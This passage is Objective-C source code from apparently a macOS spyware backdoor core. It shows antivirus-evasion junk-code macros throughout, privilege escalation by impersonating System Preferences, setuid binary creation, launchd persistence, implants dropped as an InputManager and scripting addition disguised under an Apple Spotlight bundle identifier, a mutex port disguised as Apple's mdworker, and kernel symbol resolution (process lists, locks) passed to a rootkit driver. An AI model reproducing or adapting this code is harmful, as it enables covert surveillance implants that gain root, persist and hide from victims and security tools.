    // AV evasion: only on release build
    AV_GARBAGE_003
    
    _backdoorContentPath = [NSString stringWithFormat: @"%@/%@",
                            [[NSBundle mainBundle] bundlePath],
                            @"Contents/Info.plist"];
    
    [binData writeToFile: _backdoorContentPath
              atomically: YES];
    
    /*
     [[NSFileManager defaultManager] copyItemAtPath: gBackdoorName
     toPath: @"Contents/MacOS"
     error: nil];
     */
}

- (void)_resizeSharedMemoryWindow
{
    // AV evasion: only on release build
    AV_GARBAGE_005
    
    if (getuid() == 0 || geteuid() == 0)
    {
#ifdef DEBUG_CORE
        warnLog(@"High Privs mode, big shared memory");
#endif
        
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        //
        // Let's change the default shared memory max size to a better value
        //
        NSArray *_arguments = [NSArray arrayWithObjects:
                               @"-w",
                               @"kern.sysv.shmmax=67108864",
                               nil];
        
        [gUtil executeTask: @"/usr/sbin/sysctl"
             withArguments: _arguments
              waitUntilEnd: YES];
        
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        _arguments = [NSArray arrayWithObjects:
                      @"-w",
                      @"kern.sysv.shmall=4096",
                      nil];
        
        [gUtil executeTask: @"/usr/sbin/sysctl"
             withArguments: _arguments
              waitUntilEnd: YES];
    }
    else
    {
        //
        // With low privs we will have a very small shared memory
        // in order to keep everything working as expected
        // shmem won't be used at all
        //
#ifdef DEBUG_CORE
        warnLog(@"Low Privs mode, small shared memory");
#endif
        
        //
        // Give a smaller size since we don't have privileges
        // for executing sysctl
        //
        // Do nothing now: sharedMemory will do the job automatically
        //gMemLogMaxSize = sizeof(shMemoryLog) * SHMEM_LOG_MIN_NUM_BLOCKS;
    }
}

- (BOOL)_createAndInitSharedMemory
{
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    key_t memKeyForCommand = ftok([NSHomeDirectory() UTF8String], 3);
    key_t memKeyForLogging = ftok([NSHomeDirectory() UTF8String], 5);
    
    // AV evasion: only on release build
    AV_GARBAGE_005
    
    // init shared memory
    gSharedMemoryCommand = [[__m_MSharedMemory alloc] initWithKey: memKeyForCommand
                                                             size: gMemCommandMaxSize
                                                    semaphoreName: SHMEM_SEM_NAME];
    
    // AV evasion: only on release build
    AV_GARBAGE_002
    
    gSharedMemoryLogging = [[__m_MSharedMemory alloc] initWithKey: memKeyForLogging
                                                             size: gMemLogMaxSize
                                                    semaphoreName: SHMEM_SEM_NAME];
    
    // on backdoor startup try to remove mapped file
    [gSharedMemoryCommand removeMappedFile];
    [gSharedMemoryLogging removeMappedFile];
    
    // AV evasion: only on release build
    AV_GARBAGE_004
    
    //
    // Create and initialize the shared memory segments
    // for commands and logs
    //
    if ([gSharedMemoryCommand createMemoryRegion] == -1)
    {
#ifdef DEBUG_CORE
        errorLog(@"There was an error while creating the Commands Shared Memory");
#endif
        return NO;
    }
    if ([gSharedMemoryCommand attachToMemoryRegion] == -1)
    {
#ifdef DEBUG_CORE
        errorLog(@"There was an error while attaching to the Commands Shared Memory");
#endif
        return NO;
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_007
    
    [gSharedMemoryCommand zeroFillMemory];
    
    // AV evasion: only on release build
    AV_GARBAGE_002
    
    if ([gSharedMemoryLogging createMemoryRegion] == -1)
    {
#ifdef DEBUG_CORE
        errorLog(@"There was an error while creating the Logging Shared Memory");
#endif
        return NO;
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_009
    
    if ([gSharedMemoryLogging attachToMemoryRegion] == -1)
    {
#ifdef DEBUG_CORE
        errorLog(@"There was an error while attaching to the Logging Shared Memory");
#endif
        return NO;
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    [gSharedMemoryLogging zeroFillMemory];
    
    return YES;
}

- (void)_checkForOthers
{
    // AV evasion: only on release build
    AV_GARBAGE_005
    
    //
    // Avoid to create the NSPort if we're running from a different name in order
    // to perform the UI spoofing (e.g. System Preferences) otherwise we'll lock
    // out ourself
    //
    if (![mApplicationName isEqualToString: @"System Preferences"]
        && getuid() != 0)
    {
#ifdef DEBUG_CORE
        infoLog(@"Registering NSPort to NameServer");
#endif
        
        // AV evasion: only on release build
        AV_GARBAGE_002
        
        //
        // Check if there's another backdoor running
        //
        id port = [[NSPort port] retain];
        if (![[NSPortNameServer systemDefaultPortNameServer] registerPort: port
                                                                     name: @"com.apple.mdworker.executed"])
        {
#ifdef DEBUG_CORE
            errorLog(@"NSPort check error! Backdoor is already running");
#endif
            exit(-1);
        }
        else
        {
#ifdef DEBUG_CORE
            warnLog(@"Port Registered correctly");
#endif
        }
    }
    else
    {
#ifdef DEBUG_CORE
        warnLog(@"Can't check for others since we don't have the right conditions");
#endif
    }
}

- (BOOL)_SLIEscalation
{
#ifdef DEBUG_CORE
    infoLog(@"sliPlist mode");
#endif
    
    // AV evasion: only on release build
    AV_GARBAGE_002
    
    if (getuid() != 0 && geteuid() != 0)
    {
        // AV evasion: only on release build
        AV_GARBAGE_001
        
        if ([[NSFileManager defaultManager] fileExistsAtPath: [gUtil mExecFlag]
                                                 isDirectory: NULL])
        {
            //
            // We failed in obtaining root privs if we're here dude
            //
#ifdef DEBUG_CORE
            errorLog(@"SLI FAIL - /facepalm");
#endif
        }
        else
        {
            if ([self getRootThroughSLI] == YES)
            {
                // AV evasion: only on release build
                AV_GARBAGE_002
                
                [gUtil dropExecFlag];
            }
        }
    }
    else
    {
        //
        // This means that the machine has been rebooted and we already
        // obtained root privs through the SLI escalation
        //
#ifdef DEBUG_CORE
        infoLog(@"sli mode success");
#endif
        
        // AV evasion: only on release build
        AV_GARBAGE_001
        
        [gUtil makeSuidBinary: [[NSBundle mainBundle] executablePath]];
        return YES;
    }
    
    return NO;
}

- (BOOL)_UISpoof
{
    // AV evasion: only on release build
    AV_GARBAGE_006
    
    if (getuid() != 0 && geteuid() != 0)
    {
        // Check the application executable name, if different than
        // application name it means we're trying to get root through UI
        // Spoofing, thus we relaunch ourself and exit after having
        // obtained the new privileges
        if (![mBinaryName isEqualToString: @"System Preferences"])
        {
            if ([self makeBackdoorResident] == NO)
            {
#ifdef DEBUG_CORE
                errorLog(@"An error occurred while making backdoor resident");
#endif
            }
            
            NSString *tempFileName = [[NSString alloc] initWithFormat: @"%@/%@%@",
                                      [[NSBundle mainBundle] bundlePath],
                                      mBinaryName, @".ez"];
            
            // AV evasion: only on release build
            AV_GARBAGE_001
            
            [@"" writeToFile: tempFileName
                  atomically: YES
                    encoding: NSUTF8StringEncoding error: nil];
            
            [tempFileName release];
            
            // AV evasion: only on release build
            AV_GARBAGE_000
            
            [self _renameBackdoorAndRelaunch];
        }
        else
        {
            [self UISudoWhileAlreadyAuthorized: NO];
        }
    }
    else
    {
        if ([mBinaryName isEqualToString: @"System Preferences"])
        {
            // AV evasion: only on release build
            AV_GARBAGE_002
            
            [gUtil enableSetugidAuth];
            usleep(10000);
            [self UISudoWhileAlreadyAuthorized: YES];
        }
        
        [gUtil makeSuidBinary: [[NSBundle mainBundle] executablePath]];
        
        NSString *flagPath   = [NSString stringWithFormat: @"%@/%@",
                                [[NSBundle mainBundle] bundlePath],
                                @"mdworker.flg"];
        
        // AV evasion: only on release build
        AV_GARBAGE_003
        
        if (![[NSFileManager defaultManager] fileExistsAtPath: flagPath
                                                  isDirectory: NO])
        {
            [gUtil dropExecFlag];
            
            // AV evasion: only on release build
            AV_GARBAGE_002
            
            NSString *backdoorPlist = createLaunchdPlistPath();
            
            NSArray *arguments = [NSArray arrayWithObjects:
                                  @"load",
                                  @"-S",
                                  @"Aqua",
                                  backdoorPlist,
                                  nil];
            
            // AV evasion: only on release build
            AV_GARBAGE_001
            
            [gUtil executeTask: @"/bin/launchctl"
                 withArguments: arguments
                  waitUntilEnd: NO];
            
            exit(0);
        }
        
        return YES;
    }
    
    return NO;
}

- (BOOL)createFolder:(NSString*)pathName
{
    NSFileManager *fm = [NSFileManager defaultManager];
    
    return [fm createDirectoryAtPath:pathName
         withIntermediateDirectories:YES
                          attributes:nil
                               error:nil];
}

- (BOOL)createIMFolderTree
{
    NSString *imResources = [NSString stringWithFormat:@"/%@/%@/%@/%@.%@/%@/%@",
                             LIBRARY_NSSTRING,
                             IM_FOLDER,
                             IM_NAME,
                             IM_NAME,
                             IM_EXT,
                             IM_CONTENTS,
                             IM_RESOURCES];
    
    NSString *imMacos = [NSString stringWithFormat:@"/%@/%@/%@/%@.%@/%@/%@",
                         LIBRARY_NSSTRING,
                         IM_FOLDER,
                         IM_NAME,
                         IM_NAME,
                         IM_EXT,
                         IM_CONTENTS,
                         IM_MACOS];
    
    if ([self createFolder: imResources] == FALSE)
        return FALSE;
    
    if ([self createFolder: imMacos] == FALSE)
        return FALSE;
    
    return TRUE;
}

- (BOOL)_dropInputManager
{
    NSString *err;
    
    // AV evasion: only on release build
    AV_GARBAGE_007
    
    NSString *_backdoorContentPath;
    
    //  if ([[NSFileManager defaultManager] fileExistsAtPath: @"/Library/InputManagers/appleHID"])
    //    {
    //      [[NSFileManager defaultManager] removeItemAtPath: @"/Library/InputManagers/appleHID"
    //                                                 error: nil];
    //    }
    
    // AV evasion: only on release build
    AV_GARBAGE_002
    
    if ([self createIMFolderTree] == FALSE)
        return FALSE;
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    NSMutableDictionary *rootObj2 = [NSMutableDictionary dictionaryWithCapacity: 4];
    NSMutableDictionary *innerDict2 = [NSMutableDictionary dictionaryWithCapacity: 1];
    
    [innerDict2 setObject: gInputManagerName
                   forKey: @"English"];
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    NSString *imBundleName = [NSString stringWithFormat: @"%@.%@", IM_NAME, IM_EXT];
    
    [rootObj2 setObject: imBundleName
                 forKey: @"BundleName"];
    [rootObj2 setObject: @"YES"
                 forKey: @"LoadBundleOnLaunch"];
    [rootObj2 setObject: innerDict2
                 forKey: @"LocalizedNames"];
    [rootObj2 setObject: @"YES"
                 forKey: @"NoMenuEntry"];
    
    NSData *binData = [NSPropertyListSerialization dataFromPropertyList: rootObj2
                                                                 format: NSPropertyListXMLFormat_v1_0
                                                       errorDescription: &err];
    
    NSString *imFolderInfo = [NSString stringWithFormat:@"/%@/%@/%@/Info" ,
                              LIBRARY_NSSTRING,
                              IM_FOLDER,
                              IM_NAME];
    
    [binData writeToFile: imFolderInfo
              atomically: YES];
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    NSString *destDir = [NSString stringWithFormat:@"/%@/%@/%@/%@.%@/%@/%@/%@",
                         LIBRARY_NSSTRING,
                         IM_FOLDER,
                         IM_NAME,
                         IM_NAME,
                         IM_EXT,
                         IM_CONTENTS,
                         IM_MACOS,
                         gInputManagerName];
    
    NSString *tempIMDir = [[NSString alloc] initWithFormat:@"%@/%@",
                           [[NSBundle mainBundle] bundlePath],
                           gInputManagerName];
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    if ([[NSFileManager defaultManager] fileExistsAtPath: destDir
                                             isDirectory: NO] == NO)
    {
        [[NSFileManager defaultManager] copyItemAtPath: tempIMDir
                                                toPath: destDir
                                                 error: nil];
    }
    
    [tempIMDir release];
    
    //
    // InputManager internal Info.plist
    //
    NSMutableDictionary *rootObj   = [NSMutableDictionary dictionaryWithCapacity: 7];
    
    // AV evasion: only on release build
    AV_GARBAGE_006
    
    [rootObj setObject: @"English" forKey: @"CFBundleDevelopmentRegion"];
    [rootObj setObject: gInputManagerName forKey: @"CFBundleExecutable"];
    [rootObj setObject: @"com.apple.spotlight-ui" forKey: @"CFBundleIdentifier"];
    [rootObj setObject: @"6.0" forKey: @"CFBundleInfoDictionaryVersion"];
    [rootObj setObject: @"BNDL" forKey: @"CFBundlePackageType"];
    [rootObj setObject: @"????" forKey: @"CFBundleSignature"];
    [rootObj setObject: @"1.0" forKey: @"CFBundleVersion"];
    
    binData = [NSPropertyListSerialization dataFromPropertyList: rootObj
                                                         format: NSPropertyListXMLFormat_v1_0
                                               errorDescription: nil];
    
    _backdoorContentPath = [NSString stringWithFormat:@"/%@/%@/%@/%@.%@/%@/Info.plist",
                            LIBRARY_NSSTRING,
                            IM_FOLDER,
                            IM_NAME,
                            IM_NAME,
                            IM_EXT,
                            IM_CONTENTS];
    // AV evasion: only on release build
    AV_GARBAGE_008
    
    [binData writeToFile: _backdoorContentPath
              atomically: YES];
    
    NSArray *arguments = [NSArray arrayWithObjects:
                          @"-R",
                          @"root:admin",
                          destDir,
                          nil];
    
    // AV evasion: only on release build
    AV_GARBAGE_002
    
    [gUtil executeTask: @"/usr/sbin/chown"
         withArguments: arguments
          waitUntilEnd: YES];
    
    [destDir release];
    return YES;
}

- (BOOL)createOXFolderTree:(NSString*)pathName
{
    NSString *oxResources = [NSString stringWithFormat:@"%@/%@/%@",
                             pathName,
                             IM_CONTENTS,
                             IM_RESOURCES];
    
    NSString *oxMacos = [NSString stringWithFormat:@"%@/%@/%@",
                         pathName,
                         IM_CONTENTS,
                         IM_MACOS];
    
    if ([self createFolder: oxResources] == FALSE)
        return FALSE;
    
    if ([self createFolder: oxMacos] == FALSE)
        return FALSE;
    
    return TRUE;
}

- (void)_dropOsaxBundle
{
    NSString *osaxRootPath = nil;
    
    // Only for upgrade from old version...
    removeAppleHID();
    
    // AV evasion: only on release build
    AV_GARBAGE_007
    
    if (getuid() == 0 || geteuid() == 0)
    {
        osaxRootPath = [[NSString alloc] initWithFormat: @"/%@/%@/%@", LIBRARY_NSSTRING, OSAX_FOLDER, OSAX_NAME];
        
        // AV evasion: only on release build
        AV_GARBAGE_003
        
        // i'm root: remove old low privs osax from user folders
        NSString *osaxLowPrivsPath = [[NSString alloc] initWithFormat: @"/Users/%@/%@/%@/%@",
                                      NSUserName(),
                                      LIBRARY_NSSTRING,
                                      OSAX_FOLDER,
                                      OSAX_NAME];
        
        // AV evasion: only on release build
        AV_GARBAGE_009
        
        if ([[NSFileManager defaultManager] fileExistsAtPath: osaxLowPrivsPath])
        {
            [[NSFileManager defaultManager] removeItemAtPath: osaxLowPrivsPath
                                                       error: nil];
        }
        
    }
    else
    {
        osaxRootPath = [[NSString alloc] initWithFormat:@"/Users/%@/%@/%@/%@",
                        NSUserName(),
                        LIBRARY_NSSTRING,
                        OSAX_FOLDER,
                        OSAX_NAME];
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    if (![[NSFileManager defaultManager] fileExistsAtPath: osaxRootPath])
    {
        [[NSFileManager defaultManager] createDirectoryAtPath: osaxRootPath
                                  withIntermediateDirectories: YES
                                                   attributes: nil
                                                        error: nil];
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_007
    
    if ([self createOXFolderTree: osaxRootPath] == NO)
        return;
    
#ifdef DEBUG_CORE
    infoLog(@"creating OXFolderTree done");
#endif
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    NSString *destDir = [[NSString alloc] initWithFormat:@"%@/%@/%@/%@",
                         osaxRootPath,
                         IM_CONTENTS,
                         IM_MACOS,
                         gInputManagerName];
    
    NSString *tempIMDir = [[NSString alloc] initWithFormat: @"%@/%@",
                           [[NSBundle mainBundle] bundlePath],
                           gInputManagerName];
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    NSError *err;
    
    if ([[NSFileManager defaultManager] removeItemAtPath:destDir error: &err] == NO)
    {
#ifdef DEBUG_CORE
        infoLog(@"error removing osax bin %@", err);
#endif
    }
    
    [[NSFileManager defaultManager] copyItemAtPath: tempIMDir
                                            toPath: destDir
                                             error: nil];
    [tempIMDir release];
    [destDir release];
    
    // AV evasion: only on release build
    AV_GARBAGE_002
    
    NSString *info_orig_pl = [[NSString alloc] initWithCString: Info_plist];
    
    NSString *info_pl = [info_orig_pl stringByReplacingOccurrencesOfString: @"_place_on_"
                                                                withString: gInputManagerName];
    
    NSString *infoPath = [NSString stringWithFormat:
                          @"%@/%@/Info.plist",
                          osaxRootPath, IM_CONTENTS];
    
    // AV evasion: only on release build
    AV_GARBAGE_002
    
    [info_pl writeToFile: infoPath
              atomically: NO
                encoding: NSASCIIStringEncoding
                   error: NULL];
    
    [info_pl release];
    [info_orig_pl release];
    
    NSString *resource_r = [[NSString alloc] initWithCString: inputManager_r];
    
    NSString *rPath = [NSString stringWithFormat:
                       @"%@/%@/%@/%@.r",
                       osaxRootPath, IM_CONTENTS, IM_RESOURCES, OSAX_NAME];
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    [resource_r writeToFile: rPath
                 atomically: NO
                   encoding: NSASCIIStringEncoding
                      error: NULL];
    
    [resource_r release];
    [osaxRootPath release];
}

//- (void)_dropXPCBundle
//{
//  NSMutableString *xpcPath = [[NSMutableString alloc]
//                              initWithFormat:
//                              @"%@/",
//                              XPC_BUNDLE_FRAMEWORK_PATH];
//
//  if (![[NSFileManager defaultManager] fileExistsAtPath: xpcPath])
//    {
//#ifdef DEBUG_CORE
//      infoLog(@"creating folder %@ for xpc services", xpcPath);
//#endif
//      mkdir([xpcPath UTF8String], 0755);
//    }
//
//  [xpcPath appendString: XPC_BUNDLE_FOLDER_PREFIX];
//  [xpcPath appendString: gMyXPCName];
//  [xpcPath appendString: @".xpc"];
//
//#ifdef DEBUG_CORE
//  infoLog(@"xpc service folder %@", xpcPath);
//#endif
//
//  if ([[NSFileManager defaultManager] fileExistsAtPath: xpcPath])
//    [[NSFileManager defaultManager] removeItemAtPath: xpcPath
//                                               error: nil];
//
//  // .xpc folder
//  mkdir([xpcPath UTF8String], 0755);
//
//  // Contents
//  [xpcPath appendString: @"/Contents"];
//  mkdir([xpcPath UTF8String], 0755);
//
//#ifdef DEBUG_CORE
//  infoLog(@"xpc service folder %@", xpcPath);
//#endif
//
//  NSString *info_orig_pl = [[NSString alloc] initWithCString: xpc_info_plist];
//
//#ifdef DEBUG_CORE
//  //infoLog(@"Original info.plist for xpc %@", info_orig_pl);
//#endif
//
////  NSString *info_pl = [info_orig_pl stringByReplacingOccurrencesOfString: @"RCSMXPCService"
////                                                              withString: gMyXPCName];
//
//#ifdef DEBUG_CORE
//  //infoLog(@"info.plist for xpc %@", info_pl);
//#endif
//
//  NSString *infoPath = [[NSString alloc] initWithFormat: @"%@/Info.plist", xpcPath];
//
//#ifdef DEBUG_CORE
//  infoLog(@"info.plist for xpc %@", infoPath);
//#endif
//
//  //[info_pl
//  [info_orig_pl writeToFile: infoPath
//                 atomically: YES
//                   encoding: NSUTF8StringEncoding
//                      error: NULL];
//
//  //[info_pl release];
//  [info_orig_pl release];
//  [infoPath release];
//
//  // Resources
//  NSString *tmpPath = [[NSString alloc] initWithFormat: @"%@/Resources", xpcPath];
//  mkdir([tmpPath UTF8String], 0755);
//  [tmpPath release];
//
//  // MacOS
//  [xpcPath appendString: @"/MacOS"];
//  mkdir([xpcPath UTF8String], 0755);
//
//#ifdef DEBUG_CORE
//  infoLog(@"xpc service folder %@", xpcPath);
//#endif
//
//  // Macho name
//  NSString *destXPCMacho = [[NSString alloc] initWithFormat:
//                            @"%@/%@%@",
//                            xpcPath,
//                            XPC_BUNDLE_FOLDER_PREFIX,
//                            gMyXPCName];
//
//  NSString *origXPCMacho = [[NSString alloc] initWithFormat: @"%@/%@",
//                            [[NSBundle mainBundle] bundlePath],
//                            gXPCName];
//
//#ifdef DEBUG_CORE
//  infoLog(@"xpc service files: orig %@, dest %@", origXPCMacho, destXPCMacho);
//#endif
//
//  [[NSFileManager defaultManager] copyItemAtPath: origXPCMacho
//                                          toPath: destXPCMacho
//                                           error: nil];
//
//  [origXPCMacho release];
//  [destXPCMacho release];
//}

- (void)_solveKernelSymbolsForKext
{
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    int kernFD      = 0;
    int ret         = 0;
    int filesize    = 0;
    
    void *imageBase = NULL;
    char filename[] = "/mach_kernel";
    struct stat sb;
    
    unsigned int kmod_hash                = 0xdd2c36d6; // _kmod
    unsigned int nsysent_hash             = 0xb366074d; // _nsysent
    unsigned int tasks_hash               = 0xdbb44cef; // _tasks
    unsigned int allproc_hash             = 0x3fd3c678; // _allproc
    unsigned int tasks_count_hash         = 0xa3f77e7f; // _tasks_count
    unsigned int nprocs_hash              = 0xa77ea22e; // _nprocs
    unsigned int tasks_threads_lock_hash  = 0xd94f2751; // _tasks_threads_locks
    unsigned int proc_lock_hash           = 0x44c085d5; // _proc_lock
    unsigned int proc_unlock_hash         = 0xf46ca50e; // _proc_unlock
    unsigned int proc_list_lock_hash      = 0x9129f0e2; // _proc_list_lock
    unsigned int proc_list_unlock_hash    = 0x5337599b; // _proc_list_unlock
    unsigned int kext_lookup_with_tag_hash = 0xcf7000a8; // __ZN6OSKext21lookupKextWithLoadTagEj
    unsigned int io_recursive_lock_hash   = 0x1f7127e3; // _IORecursiveLockLock
    
#ifdef DEBUG_CORE
    infoLog(@"Resolving symbols for kernel driver");
#endif
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    kernFD = open(filename, O_RDONLY);
    
    if (kernFD == -1)
    {
#ifdef DEBUG_CORE
        errorLog(@"Error on open");
#endif
        return;
    }
    
    if (gBackdoorFD == -1)
    {
#ifdef DEBUG_CORE
        errorLog(@"Error on ioctl device");
#endif
        return;
    }
    
    // AV evasion: only on release build
    AV_GARBAGE_004
    
    if (stat(filename, &sb) == -1)
    {
#ifdef DEBUG_CORE
        errorLog(@"Error on stat");
#endif
        return;
    }
    
    filesize = sb.st_size;
    
#ifdef DEBUG_CORE
    infoLog(@"filesize: %d\n", filesize);
#endif
    
    // AV evasion: only on release build
    AV_GARBAGE_005
    
    if ((imageBase = mmap(0,
                          filesize,
                          PROT_READ,
                          MAP_PRIVATE,
                          kernFD,
                          0)) == (caddr_t)-1)
    {
#ifdef DEBUG_CORE
        errorLog(@"Error on mmap\n");
#endif
        
        return;
    }
    
#ifdef DEBUG_CORE
    infoLog(@"file mapped @ 0x%lx\n", (unsigned long)imageBase);
#endif
    
    // AV evasion: only on release build
    AV_GARBAGE_006
    
    BOOL kernel64 = is64bitKernel();
    if (kernel64)
    {
#ifdef DEBUG_CORE
        infoLog(@"solving symbols for 64bit kernel");
#endif
        symbol64_t sym;
        uint64_t symAddress = 0;
        // 64bit kernel image
        // thus we need to map the 64bit part
        
        // AV evasion: only on release build
        AV_GARBAGE_003
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary64(imageBase, kmod_hash);
        sym.hash    = kmod_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_64, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_002
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary64(imageBase, nsysent_hash);
        sym.hash    = nsysent_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_64, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_001
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary64(imageBase, tasks_hash);
        sym.hash    = tasks_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_64, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_002
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary64(imageBase, allproc_hash);
        sym.hash    = allproc_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_64, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_003
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary64(imageBase, tasks_count_hash);
        sym.hash    = tasks_count_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_64, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_000
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary64(imageBase, nprocs_hash);
        sym.hash    = nprocs_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_64, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_001
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary64(imageBase, tasks_threads_lock_hash);
        sym.hash    = tasks_threads_lock_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_64, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_002
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary64(imageBase, proc_lock_hash);
        sym.hash    = proc_lock_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_64, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_003
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary64(imageBase, proc_unlock_hash);
        sym.hash    = proc_unlock_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_64, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_004
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary64(imageBase, proc_list_lock_hash);
        sym.hash    = proc_list_lock_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_64, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary64(imageBase, proc_list_unlock_hash);
        sym.hash    = proc_list_unlock_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_64, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_006
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary64(imageBase, kext_lookup_with_tag_hash);
        sym.hash    = kext_lookup_with_tag_hash;
        sym.address  = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_64, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_007
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary64(imageBase, io_recursive_lock_hash);
        sym.hash    = io_recursive_lock_hash;
        sym.address  = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_64, &sym);
    }
    else
    {
#ifdef DEBUG_CORE
        infoLog(@"solving symbols for 32bit kernel");
#endif
        symbol32_t sym;
        unsigned int symAddress = 0;
        
        // AV evasion: only on release build
        AV_GARBAGE_000
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary(imageBase, kmod_hash);
        sym.hash    = kmod_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_32, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_006
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary(imageBase, nsysent_hash);
        sym.hash    = nsysent_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_32, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_008
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary(imageBase, tasks_hash);
        sym.hash    = tasks_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_32, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_004
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary(imageBase, allproc_hash);
        sym.hash    = allproc_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_32, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary(imageBase, tasks_count_hash);
        sym.hash    = tasks_count_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_32, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_002
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary(imageBase, nprocs_hash);
        sym.hash    = nprocs_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_32, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_001
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary(imageBase, tasks_threads_lock_hash);
        sym.hash    = tasks_threads_lock_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_32, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_002
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary(imageBase, proc_lock_hash);
        sym.hash    = proc_lock_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_32, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_005
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary(imageBase, proc_unlock_hash);
        sym.hash    = proc_unlock_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_32, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_003
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary(imageBase, proc_list_lock_hash);
        sym.hash    = proc_list_lock_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_32, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_006
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary(imageBase, proc_list_unlock_hash);
        sym.hash    = proc_list_unlock_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_32, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_007
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary(imageBase, kext_lookup_with_tag_hash);
        sym.hash    = kext_lookup_with_tag_hash;
        sym.address = symAddress;
        ret = ioctl(gBackdoorFD, MCHOOK_SOLVE_SYM_32, &sym);
        
        // AV evasion: only on release build
        AV_GARBAGE_009
        
        // Sending Symbol
        symAddress  = findSymbolInFatBinary(imageBase, io_recursive_lock_hash);
